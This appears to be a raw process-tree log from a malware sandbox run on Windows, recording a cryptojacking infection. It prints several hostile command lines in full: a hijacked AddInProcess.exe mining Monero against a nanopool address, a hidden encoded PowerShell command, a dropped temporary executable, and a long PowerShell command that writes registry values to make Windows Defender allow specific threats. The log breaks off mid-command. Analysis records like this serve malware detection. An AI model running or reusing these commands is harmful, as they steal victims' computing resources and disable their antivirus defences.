C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1784 -s 4685⤵
- Drops file in Windows directory
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1784 -s 4605⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1248 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1248 -s 4405⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3272 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3272 -s 4605⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4632 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4632 -s 4405⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 380 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 380 -s 4405⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 4845⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3236 -s 4685⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3236 -s 4605⤵
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffeb5c4f50,0x7fffeb5c4f60,0x7fffeb5c4f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1760 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1544 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5204 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,16411385493229240303,1814349427365261085,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffd7454f50,0x7fffd7454f60,0x7fffd7454f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1464 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2580 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1952 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1536,11545917833078999842,266183021118111081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffeb5c4f50,0x7fffeb5c4f60,0x7fffeb5c4f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1552 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1924 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5008 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,4712059585596219746,6122881449384386907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5012 /prefetch:83⤵
-
C:\Windows\system32\systemreset.exe"C:\Windows\system32\systemreset.exe" -moset2⤵
-
C:\Windows\system32\systemreset.exe"C:\Windows\system32\systemreset.exe" -moset2⤵
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\$SysReset\Scratch\707D38EC-7437-4A10-87B0-BB9617D1CFC8\dismhost.exeC:\$SysReset\Scratch\707D38EC-7437-4A10-87B0-BB9617D1CFC8\dismhost.exe {21B73277-F815-477D-99BA-A60C8703A5D9}3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\systemreset.exe"C:\Windows\system32\systemreset.exe" -moset2⤵
-
C:\Windows\system32\systemreset.exe"C:\Windows\system32\systemreset.exe" -moset2⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\KtGVHBl.exeC:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\KtGVHBl.exe Sk /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 